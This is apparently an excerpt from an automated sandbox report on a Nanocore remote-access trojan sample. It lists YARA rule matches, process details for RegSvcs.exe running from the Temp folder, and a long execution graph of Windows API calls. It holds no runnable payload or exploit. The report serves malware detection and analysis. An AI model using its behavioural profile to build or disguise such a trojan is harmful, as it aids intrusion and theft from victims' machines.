              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              General

              Target ID:36
              Start time:17:53:12
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x7b0000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:37
              Start time:17:53:20
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0xa0000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:10%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:10.2%
                Total number of Nodes:1493
                Total number of Limit Nodes:46
                execution_graph 25408 401f40 CloseHandle 25411 3ef530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25412 3eff30 LocalFree 24131 3fbb30 24132 3fbb42 24131->24132 24133 3fbb39 24131->24133 24135 3fba27 24133->24135 24136 3f97e5 _abort 38 API calls 24135->24136 24137 3fba34 24136->24137 24155 3fbb4e 24137->24155 24139 3fba3c 24164 3fb7bb 24139->24164 24142 3fba53 24142->24132 24145 3fba96 24148 3f8dcc _free 20 API calls 24145->24148 24148->24142 24149 3fba91 24188 3f91a8 20 API calls _abort 24149->24188 24151 3fbada 24151->24145 24189 3fb691 26 API calls 24151->24189 24152 3fbaae 24152->24151 24153 3f8dcc _free 20 API calls 24152->24153 24153->24151 24156 3fbb5a ___scrt_is_nonwritable_in_current_image 24155->24156 24157 3f97e5 _abort 38 API calls 24156->24157 24159 3fbb64 24157->24159 24162 3fbbe8 _abort 24159->24162 24163 3f8dcc _free 20 API calls 24159->24163 24190 3f8d24 38 API calls _abort 24159->24190 24191 3fac31 EnterCriticalSection 24159->24191 24192 3fbbdf LeaveCriticalSection _abort 24159->24192 24162->24139 24163->24159 24165 3f4636 __fassign 38 API calls 24164->24165 24166 3fb7cd 24165->24166 24167 3fb7ee 24166->24167 24168 3fb7dc GetOEMCP 24166->24168 24169 3fb805 24167->24169 24170 3fb7f3 GetACP 24167->24170 24168->24169 24169->24142 24171 3f8e06 24169->24171 24170->24169 24172 3f8e44 24171->24172 24176 3f8e14 _abort 24171->24176 24194 3f91a8 20 API calls _abort 24172->24194 24174 3f8e2f RtlAllocateHeap 24175 3f8e42 24174->24175 24174->24176 24175->24145 24178 3fbbf0 24175->24178 24176->24172 24176->24174 24193 3f7a5e 7 API calls 2 library calls 24176->24193 24179 3fb7bb 40 API calls 24178->24179 24180 3fbc0f 24179->24180 24183 3fbc60 IsValidCodePage 24180->24183 24185 3fbc16 24180->24185 24186 3fbc85 __cftof 24180->24186 24181 3efbbc CatchGuardHandler 5 API calls 24182 3fba89 24181->24182 24182->24149 24182->24152 24184 3fbc72 GetCPInfo 24183->24184 24183->24185 24184->24185 24184->24186 24185->24181 24195 3fb893 GetCPInfo 24186->24195 24188->24145 24189->24145 24191->24159 24192->24159 24193->24176 24194->24175 24196 3fb977 24195->24196 24200 3fb8cd 24195->24200 24199 3efbbc CatchGuardHandler 5 API calls 24196->24199 24202 3fba23 24199->24202 24205 3fc988 24200->24205 24202->24185 24204 3fab78 __vsnwprintf_l 43 API calls 24204->24196 24206 3f4636 __fassign 38 API calls 24205->24206 24207 3fc9a8 MultiByteToWideChar 24206->24207 24209 3fca7e 24207->24209 24210 3fc9e6 24207->24210 24211 3efbbc CatchGuardHandler 5 API calls 24209->24211 24212 3f8e06 __vsnwprintf_l 21 API calls 24210->24212 24215 3fca07 __cftof __vsnwprintf_l 24210->24215 24213 3fb92e 24211->24213 24212->24215 24219 3fab78 24213->24219 24214 3fca78 24224 3fabc3 20 API calls _free 24214->24224 24215->24214 24217 3fca4c MultiByteToWideChar 24215->24217 24217->24214 24218 3fca68 GetStringTypeW 24217->24218 24218->24214 24220 3f4636 __fassign 38 API calls 24219->24220 24221 3fab8b 24220->24221 24225 3fa95b 24221->24225 24224->24209 24226 3fa976 __vsnwprintf_l 24225->24226 24227 3fa99c MultiByteToWideChar 24226->24227 24228 3fa9c6 24227->24228 24229 3fab50 24227->24229 24232 3f8e06 __vsnwprintf_l 21 API calls 24228->24232 24235 3fa9e7 __vsnwprintf_l 24228->24235 24230 3efbbc CatchGuardHandler 5 API calls 24229->24230 24231 3fab63 24230->24231 24231->24204 24232->24235 24233 3faa9c 24261 3fabc3 20 API calls _free 24233->24261 24234 3faa30 MultiByteToWideChar 24234->24233 24236 3faa49 24234->24236 24235->24233 24235->24234 24252 3faf6c 24236->24252 24240 3faaab 24244 3f8e06 __vsnwprintf_l 21 API calls 24240->24244 24247 3faacc __vsnwprintf_l 24240->24247 24241 3faa73 24241->24233 24243 3faf6c __vsnwprintf_l 11 API calls 24241->24243 24242 3fab41 24260 3fabc3 20 API calls _free 24242->24260 24243->24233 24244->24247 24245 3faf6c __vsnwprintf_l 11 API calls 24248 3fab20 24245->24248 24247->24242 24247->24245 24248->24242 24249 3fab2f WideCharToMultiByte 24248->24249 24249->24242 24250 3fab6f 24249->24250 24262 3fabc3 20 API calls _free 24250->24262 24253 3fac98 _abort 5 API calls 24252->24253 24254 3faf93 24253->24254 24257 3faf9c 24254->24257 24263 3faff4 10 API calls 3 library calls 24254->24263 24256 3fafdc LCMapStringW 24256->24257 24258 3efbbc CatchGuardHandler 5 API calls 24257->24258 24259 3faa60 24258->24259 24259->24233 24259->24240 24259->24241 24260->24233 24261->24229 24262->24233 24263->24256 25359 3fc030 GetProcessHeap 25360 3d1025 29 API calls 25361 3ff421 21 API calls __vsnwprintf_l 25362 3ec220 93 API calls _swprintf 25416 3d1710 86 API calls 25417 3ead10 73 API calls 25365 3ea400 GdipDisposeImage GdipFree 25366 3ed600 70 API calls 25367 3f6000 QueryPerformanceFrequency QueryPerformanceCounter 25369 3ff200 51 API calls 25419 3f2900 6 API calls 4 library calls 25421 3fa700 21 API calls 24292 3d9f7a 24293 3d9f8f 24292->24293 24294 3d9f88 24292->24294 24295 3d9f9c GetStdHandle 24293->24295 24302 3d9fab 24293->24302 24295->24302 24296 3da003 WriteFile 24296->24302 24297 3d9fcf 24298 3d9fd4 WriteFile 24297->24298 24297->24302 24298->24297 24298->24302 24300 3da095 24304 3d6e98 77 API calls 24300->24304 24302->24294 24302->24296 24302->24297 24302->24298 24302->24300 24303 3d6baa 78 API calls 24302->24303 24303->24302 24304->24294 25371 3d1075 84 API calls 24306 3d9a74 24310 3d9a7e 24306->24310 24307 3d9ab1 24308 3d9b9d SetFilePointer 24308->24307 24309 3d9bb6 GetLastError 24308->24309 24309->24307 24310->24307 24310->24308 24312 3d9b79 24310->24312 24313 3d981a 24310->24313 24312->24308 24314 3d9833 24313->24314 24317 3d9e80 79 API calls 24314->24317 24315 3d9837 24318 3d9e80 79 API calls 24315->24318 24316 3d9865 24316->24312 24317->24315 24318->24316 25372 3ea070 10 API calls 25374 3eb270 99 API calls 25424 3d1f72 128 API calls __EH_prolog 25425 3f7f6e 52 API calls 2 library calls 25375 3ec793 107 API calls 5 library calls 25377 3f8268 55 API calls _free 25261 3ecd58 25263 3ece22 25261->25263 25268 3ecd7b _wcschr 25261->25268 25262 3eb314 ExpandEnvironmentStringsW 25274 3ec793 _wcslen _wcsrchr 25262->25274 25263->25274 25289 3ed78f 25263->25289 25265 3ed40a 25266 3e1fbb CompareStringW 25266->25268 25268->25263 25268->25266 25269 3eca67 SetWindowTextW 25269->25274 25272 3f3e3e 22 API calls 25272->25274 25274->25262 25274->25265 25274->25269 25274->25272 25275 3ec855 SetFileAttributesW 25274->25275 25280 3ecc31 GetDlgItem SetWindowTextW SendMessageW 25274->25280 25283 3ecc71 SendMessageW 25274->25283 25288 3e1fbb CompareStringW 25274->25288 25313 3ea64d GetCurrentDirectoryW 25274->25313 25315 3da5d1 6 API calls 25274->25315 25316 3da55a FindClose 25274->25316 25317 3eb48e 76 API calls 2 library calls 25274->25317 25277 3ec90f GetFileAttributesW 25275->25277 25287 3ec86f __cftof _wcslen 25275->25287 25277->25274 25279 3ec921 DeleteFileW 25277->25279 25279->25274 25281 3ec932 25279->25281 25280->25274 25282 3d4092 _swprintf 51 API calls 25281->25282 25284 3ec952 GetFileAttributesW 25282->25284 25283->25274 25284->25281 25285 3ec967 MoveFileW 25284->25285 25285->25274 25286 3ec97f MoveFileExW 25285->25286 25286->25274 25287->25274 25287->25277 25314 3db991 51 API calls 3 library calls 25287->25314 25288->25274 25292 3ed799 __cftof _wcslen 25289->25292 25290 3ed9e7 25290->25274 25291 3ed9c0 25291->25290 25297 3ed9de ShowWindow 25291->25297 25292->25290 25292->25291 25293 3ed8a5 25292->25293 25318 3e1fbb CompareStringW 25292->25318 25294 3da231 3 API calls 25293->25294 25296 3ed8ba 25294->25296 25298 3ed8d9 ShellExecuteExW 25296->25298 25319 3db6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 25296->25319 25297->25290 25298->25290 25304 3ed8ec 25298->25304 25300 3ed8d1 25300->25298 25301 3ed925 25320 3edc3b 6 API calls 25301->25320 25302 3ed97b CloseHandle 25303 3ed989 25302->25303 25309 3ed994 25302->25309 25321 3e1fbb CompareStringW 25303->25321 25304->25301 25304->25302 25305 3ed91b ShowWindow 25304->25305 25305->25301 25308 3ed93d 25308->25302 25310 3ed950 GetExitCodeProcess 25308->25310 25309->25291 25310->25302 25311 3ed963 25310->25311 25311->25302 25313->25274 25314->25287 25315->25274 25316->25274 25317->25274 25318->25293 25319->25300 25320->25308 25321->25309 25379 3ee455 14 API calls ___delayLoadHelper2@8 25381 3ea440 GdipCloneImage GdipAlloc 25382 3f3a40 5 API calls CatchGuardHandler 25428 3e1bbd GetCPInfo IsDBCSLeadByte 25429 3fb1b8 27 API calls 2 library calls 23449 3ef3b2 23450 3ef3be ___scrt_is_nonwritable_in_current_image 23449->23450 23481 3eeed7 23450->23481 23452 3ef3c5 23453 3ef518 23452->23453 23456 3ef3ef 23452->23456 23554 3ef838 4 API calls 2 library calls 23453->23554 23455 3ef51f 23547 3f7f58 23455->23547 23465 3ef42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23456->23465 23492 3f8aed 23456->23492 23463 3ef40e 23471 3ef48f 23465->23471 23550 3f7af4 38 API calls _abort 23465->23550 23467 3ef495 23501 3f8a3e 51 API calls 23467->23501 23470 3ef49d 23502 3edf1e 23470->23502 23500 3ef953 GetStartupInfoW __cftof 23471->23500 23475 3ef4b1 23475->23455 23476 3ef4b5 23475->23476 23477 3ef4be 23476->23477 23552 3f7efb 28 API calls _abort 23476->23552 23553 3ef048 12 API calls ___scrt_uninitialize_crt 23477->23553 23480 3ef4c6 23480->23463 23482 3eeee0 23481->23482 23556 3ef654 IsProcessorFeaturePresent 23482->23556 23484 3eeeec 23557 3f2a5e 23484->23557 23486 3eeef1 23487 3eeef5 23486->23487 23565 3f8977 23486->23565 23487->23452 23490 3eef0c 23490->23452 23493 3f8b04 23492->23493 23494 3efbbc CatchGuardHandler 5 API calls 23493->23494 23495 3ef408 23494->23495 23495->23463 23496 3f8a91 23495->23496 23498 3f8ac0 23496->23498 23497 3efbbc CatchGuardHandler 5 API calls 23499 3f8ae9 23497->23499 23498->23497 23499->23465 23500->23467 23501->23470 23624 3e0863 23502->23624 23506 3edf3d 23673 3eac16 23506->23673 23508 3edf46 __cftof 23509 3edf59 GetCommandLineW 23508->23509 23510 3edf68 23509->23510 23511 3edfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23509->23511 23710 3ec5c4 83 API calls 23510->23710 23677 3d4092 23511->23677 23515 3edf6e 23517 3edf76 OpenFileMappingW 23515->23517 23518 3edfe0 23515->23518 23521 3edf8f MapViewOfFile 23517->23521 23522 3edfd6 CloseHandle 23517->23522 23712 3edbde SetEnvironmentVariableW SetEnvironmentVariableW 23518->23712 23524 3edfcd UnmapViewOfFile 23521->23524 23525 3edfa0 __InternalCxxFrameHandler 23521->23525 23522->23511 23524->23522 23711 3edbde SetEnvironmentVariableW SetEnvironmentVariableW 23525->23711 23530 3e90b7 8 API calls 23532 3ee0aa DialogBoxParamW 23530->23532 23531 3edfbc 23531->23524 23533 3ee0e4 23532->23533 23534 3ee0fd 23533->23534 23535 3ee0f6 Sleep 23533->23535 23537 3ee10b 23534->23537 23713 3eae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23534->23713 23535->23534 23538 3ee12a DeleteObject 23537->23538 23539 3ee13f DeleteObject 23538->23539 23540 3ee146 23538->23540 23539->23540 23541 3ee189 23540->23541 23542 3ee177 23540->23542 23707 3eac7c 23541->23707 23714 3edc3b 6 API calls 23542->23714 23544 3ee17d CloseHandle 23544->23541 23546 3ee1c3 23551 3ef993 GetModuleHandleW 23546->23551 24005 3f7cd5 23547->24005 23550->23471 23551->23475 23552->23477 23553->23480 23554->23455 23556->23484 23569 3f3b07 23557->23569 23560 3f2a67 23560->23486 23562 3f2a6f 23563 3f2a7a 23562->23563 23583 3f3b43 DeleteCriticalSection 23562->23583 23563->23486 23612 3fc05a 23565->23612 23568 3f2a7d 7 API calls 2 library calls 23568->23487 23571 3f3b10 23569->23571 23572 3f3b39 23571->23572 23573 3f2a63 23571->23573 23584 3f3d46 23571->23584 23589 3f3b43 DeleteCriticalSection 23572->23589 23573->23560 23575 3f2b8c 23573->23575 23605 3f3c57 23575->23605 23579 3f2bbc 23579->23562 23580 3f2baf 23580->23579 23611 3f2bbf 6 API calls ___vcrt_FlsFree 23580->23611 23582 3f2ba1 23582->23562 23583->23560 23590 3f3c0d 23584->23590 23587 3f3d7e InitializeCriticalSectionAndSpinCount 23588 3f3d69 23587->23588 23588->23571 23589->23573 23591 3f3c26 23590->23591 23594 3f3c4f 23590->23594 23591->23594 23597 3f3b72 23591->23597 23594->23587 23594->23588 23595 3f3c3b GetProcAddress 23595->23594 23596 3f3c49 23595->23596 23596->23594 23598 3f3b7e ___vcrt_FlsSetValue 23597->23598 23599 3f3bf3 23598->23599 23600 3f3b95 LoadLibraryExW 23598->23600 23604 3f3bd5 LoadLibraryExW 23598->23604 23599->23594 23599->23595 23601 3f3bfa 23600->23601 23602 3f3bb3 GetLastError 23600->23602 23601->23599 23603 3f3c02 FreeLibrary 23601->23603 23602->23598 23603->23599 23604->23598 23604->23601 23606 3f3c0d ___vcrt_FlsSetValue 5 API calls 23605->23606 23607 3f3c71 23606->23607 23608 3f3c8a TlsAlloc 23607->23608 23609 3f2b96 23607->23609 23609->23582 23610 3f3d08 6 API calls ___vcrt_FlsSetValue 23609->23610 23610->23580 23611->23582 23615 3fc073 23612->23615 23614 3eeefe 23614->23490 23614->23568 23616 3efbbc 23615->23616 23617 3efbc4 23616->23617 23618 3efbc5 IsProcessorFeaturePresent 23616->23618 23617->23614 23620 3efc07 23618->23620 23623 3efbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23620->23623 23622 3efcea 23622->23614 23623->23622 23715 3eec50 23624->23715 23627 3e0888 GetProcAddress 23630 3e08b9 GetProcAddress 23627->23630 23631 3e08a1 23627->23631 23628 3e08e7 23629 3e0c14 GetModuleFileNameW 23628->23629 23726 3f75fb 42 API calls 2 library calls 23628->23726 23632 3e0c32 23629->23632 23636 3e08cb 23630->23636 23631->23630 23643 3e0c94 GetFileAttributesW 23632->23643 23644 3e0cac 23632->23644 23646 3e0c5d CompareStringW 23632->23646 23717 3db146 23632->23717 23720 3e081b 23632->23720 23634 3e0b54 23634->23629 23635 3e0b5f GetModuleFileNameW CreateFileW 23634->23635 23637 3e0b8f SetFilePointer 23635->23637 23638 3e0c08 CloseHandle 23635->23638 23636->23628 23637->23638 23639 3e0b9d ReadFile 23637->23639 23638->23629 23639->23638 23641 3e0bbb 23639->23641 23641->23638 23645 3e081b 2 API calls 23641->23645 23643->23632 23643->23644 23647 3e0cb7 23644->23647 23650 3e0cec 23644->23650 23645->23641 23646->23632 23649 3e0cd0 GetFileAttributesW 23647->23649 23652 3e0ce8 23647->23652 23648 3e0dfb 23672 3ea64d GetCurrentDirectoryW 23648->23672 23649->23647 23649->23652 23650->23648 23651 3db146 GetVersionExW 23650->23651 23653 3e0d06 23651->23653 23652->23650 23654 3e0d0d 23653->23654 23655 3e0d73 23653->23655 23657 3e081b 2 API calls 23654->23657 23656 3d4092 _swprintf 51 API calls 23655->23656 23658 3e0d9b AllocConsole 23656->23658 23659 3e0d17 23657->23659 23660 3e0da8 GetCurrentProcessId AttachConsole 23658->23660 23661 3e0df3 ExitProcess 23658->23661 23662 3e081b 2 API calls 23659->23662 23731 3f3e13 23660->23731 23664 3e0d21 23662->23664 23727 3de617 23664->23727 23665 3e0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23665->23661 23668 3d4092 _swprintf 51 API calls 23669 3e0d4f 23668->23669 23670 3de617 53 API calls 23669->23670 23671 3e0d5e 23670->23671 23671->23661 23672->23506 23674 3e081b 2 API calls 23673->23674 23675 3eac2a OleInitialize 23674->23675 23676 3eac4d GdiplusStartup SHGetMalloc 23675->23676 23676->23508 23756 3d4065 23677->23756 23680 3eb6dd LoadBitmapW 23681 3eb6fe 23680->23681 23682 3eb70b GetObjectW 23680->23682 23833 3ea6c2 FindResourceW 23681->23833 23684 3eb71a 23682->23684 23828 3ea5c6 23684->23828 23687 3eb770 23699 3dda42 23687->23699 23689 3eb74c 23847 3ea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23689->23847 23690 3ea6c2 12 API calls 23692 3eb73d 23690->23692 23692->23689 23694 3eb743 DeleteObject 23692->23694 23693 3eb754 23848 3ea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23693->23848 23694->23689 23696 3eb75d 23849 3ea80c 8 API calls 23696->23849 23698 3eb764 DeleteObject 23698->23687 23860 3dda67 23699->23860 23704 3e90b7 23993 3eeb38 23704->23993 23708 3eacab GdiplusShutdown OleUninitialize 23707->23708 23708->23546 23710->23515 23711->23531 23712->23511 23713->23537 23714->23544 23716 3e086d GetModuleHandleW 23715->23716 23716->23627 23716->23628 23718 3db15a GetVersionExW 23717->23718 23719 3db196 23717->23719 23718->23719 23719->23632 23721 3eec50 23720->23721 23722 3e0828 GetSystemDirectoryW 23721->23722 23723 3e085e 23722->23723 23724 3e0840 23722->23724 23723->23632 23725 3e0851 LoadLibraryW 23724->23725 23725->23723 23726->23634 23728 3de627 23727->23728 23733 3de648 23728->23733 23732 3f3e1b 23731->23732 23732->23665 23732->23732 23739 3dd9b0 23733->23739 23736 3de66b LoadStringW 23737 3de645 23736->23737 23738 3de682 LoadStringW 23736->23738 23737->23668 23738->23737 23744 3dd8ec 23739->23744 23741 3dd9cd 23742 3dd9e2 23741->23742 23752 3dd9f0 26 API calls 23741->23752 23742->23736 23742->23737 23745 3dd904 23744->23745 23751 3dd984 _strncpy 23744->23751 23747 3dd928 23745->23747 23753 3e1da7 WideCharToMultiByte 23745->23753 23750 3dd959 23747->23750 23754 3de5b1 50 API calls __vsnprintf 23747->23754 23755 3f6159 26 API calls 3 library calls 23750->23755 23751->23741 23752->23742 23753->23747 23754->23750 23755->23751 23757 3d407c __vswprintf_c_l 23756->23757 23760 3f5fd4 23757->23760 23763 3f4097 23760->23763 23764 3f40bf 23763->23764 23766 3f40d7 23763->23766 23780 3f91a8 20 API calls _abort 23764->23780 23765 3f40df 23782 3f4636 23765->23782 23766->23764 23766->23765 23769 3f40c4 23781 3f9087 26 API calls __cftof 23769->23781 23773 3efbbc CatchGuardHandler 5 API calls 23775 3d4086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23773->23775 23774 3f4167 23791 3f49e6 51 API calls 4 library calls 23774->23791 23775->23680 23778 3f4172 23792 3f46b9 20 API calls _free 23778->23792 23779 3f40cf 23779->23773 23780->23769 23781->23779 23783 3f4653 23782->23783 23784 3f40ef 23782->23784 23783->23784 23793 3f97e5 GetLastError 23783->23793 23790 3f4601 20 API calls 2 library calls 23784->23790 23786 3f4674 23814 3f993a 38 API calls __fassign 23786->23814 23788 3f468d 23815 3f9967 38 API calls __fassign 23788->23815 23790->23774 23791->23778 23792->23779 23794 3f97fb 23793->23794 23795 3f9807 23793->23795 23816 3fae5b 11 API calls 2 library calls 23794->23816 23817 3fb136 20 API calls 2 library calls 23795->23817 23798 3f9801 23798->23795 23800 3f9850 SetLastError 23798->23800 23799 3f9813 23805 3f981b 23799->23805 23824 3faeb1 11 API calls 2 library calls 23799->23824 23800->23786 23802 3f9830 23804 3f9837 23802->23804 23802->23805 23825 3f9649 20 API calls _abort 23804->23825 23818 3f8dcc 23805->23818 23806 3f9821 23807 3f985c SetLastError 23806->23807 23826 3f8d24 38 API calls _abort 23807->23826 23809 3f9842 23811 3f8dcc _free 20 API calls 23809->23811 23813 3f9849 23811->23813 23813->23800 23813->23807 23814->23788 23815->23784 23816->23798 23817->23799 23819 3f8dd7 RtlFreeHeap 23818->23819 23820 3f8e00 _free 23818->23820 23819->23820 23821 3f8dec 23819->23821 23820->23806 23827 3f91a8 20 API calls _abort 23821->23827 23823 3f8df2 GetLastError 23823->23820 23824->23802 23825->23809 23827->23823 23850 3ea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23828->23850 23830 3ea5cd 23831 3ea5d9 23830->23831 23851 3ea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23830->23851 23831->23687 23831->23689 23831->23690 23834 3ea7d3 23833->23834 23835 3ea6e5 SizeofResource 23833->23835 23834->23682 23834->23684 23835->23834 23836 3ea6fc LoadResource 23835->23836 23836->23834 23837 3ea711 LockResource 23836->23837 23837->23834 23838 3ea722 GlobalAlloc 23837->23838 23838->23834 23839 3ea73d GlobalLock 23838->23839 23840 3ea7cc GlobalFree 23839->23840 23841 3ea74c __InternalCxxFrameHandler 23839->23841 23840->23834 23842 3ea7c5 GlobalUnlock 23841->23842 23852 3ea626 GdipAlloc 23841->23852 23842->23840 23845 3ea79a GdipCreateHBITMAPFromBitmap 23846 3ea7b0 23845->23846 23846->23842 23847->23693 23848->23696 23849->23698 23850->23830 23851->23831 23853 3ea638 23852->23853 23854 3ea645 23852->23854 23856 3ea3b9 23853->23856 23854->23842 23854->23845 23854->23846 23857 3ea3da GdipCreateBitmapFromStreamICM 23856->23857 23858 3ea3e1 GdipCreateBitmapFromStream 23856->23858 23859 3ea3e6 23857->23859 23858->23859 23859->23854 23861 3dda75 _wcschr __EH_prolog 23860->23861 23862 3ddaa4 GetModuleFileNameW 23861->23862 23863 3ddad5 23861->23863 23864 3ddabe 23862->23864 23906 3d98e0 23863->23906 23864->23863 23866 3ddb31 23917 3f6310 23866->23917 23868 3de261 78 API calls 23871 3ddb05 23868->23871 23871->23866 23871->23868 23884 3ddd4a 23871->23884 23872 3ddb44 23873 3f6310 26 API calls 23872->23873 23881 3ddb56 ___vcrt_FlsSetValue 23873->23881 23874 3ddc85 23874->23884 23953 3d9d70 81 API calls 23874->23953 23878 3ddc9f ___std_exception_copy 23879 3d9bd0 82 API calls 23878->23879 23878->23884 23882 3ddcc8 ___std_exception_copy 23879->23882 23881->23874 23881->23884 23931 3d9e80 23881->23931 23947 3d9bd0 23881->23947 23952 3d9d70 81 API calls 23881->23952 23882->23884 23901 3ddcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 23882->23901 23954 3e1b84 MultiByteToWideChar 23882->23954 23940 3d959a 23884->23940 23885 3de159 23890 3de1de 23885->23890 23960 3f8cce 26 API calls 2 library calls 23885->23960 23888 3de16e 23961 3f7625 26 API calls 2 library calls 23888->23961 23889 3de1c6 23962 3de27c 78 API calls 23889->23962 23891 3de214 23890->23891 23894 3de261 78 API calls 23890->23894 23895 3f6310 26 API calls 23891->23895 23894->23890 23896 3de22d 23895->23896 23897 3f6310 26 API calls 23896->23897 23897->23884 23900 3e1da7 WideCharToMultiByte 23900->23901 23901->23884 23901->23885 23901->23900 23955 3de5b1 50 API calls __vsnprintf 23901->23955 23956 3f6159 26 API calls 3 library calls 23901->23956 23957 3f8cce 26 API calls 2 library calls 23901->23957 23958 3f7625 26 API calls 2 library calls 23901->23958 23959 3de27c 78 API calls 23901->23959 23904 3de29e GetModuleHandleW FindResourceW 23905 3dda55 23904->23905 23905->23704 23907 3d98ea 23906->23907 23908 3d994b CreateFileW 23907->23908 23909 3d996c GetLastError 23908->23909 23913 3d99bb 23908->23913 23963 3dbb03 23909->23963 23911 3d998c 23911->23913 23914 3d9990 CreateFileW GetLastError 23911->23914 23912 3d99ff 23912->23871 23913->23912 23915 3d99e5 SetFileTime 23913->23915 23914->23913 23916 3d99b5 23914->23916 23915->23912 23916->23913 23918 3f6349 23917->23918 23919 3f634d 23918->23919 23930 3f6375 23918->23930 23967 3f91a8 20 API calls _abort 23919->23967 23921 3f6352 23968 3f9087 26 API calls __cftof 23921->23968 23922 3f6699 23924 3efbbc CatchGuardHandler 5 API calls 23922->23924 23926 3f66a6 23924->23926 23925 3f635d 23927 3efbbc CatchGuardHandler 5 API calls 23925->23927 23926->23872 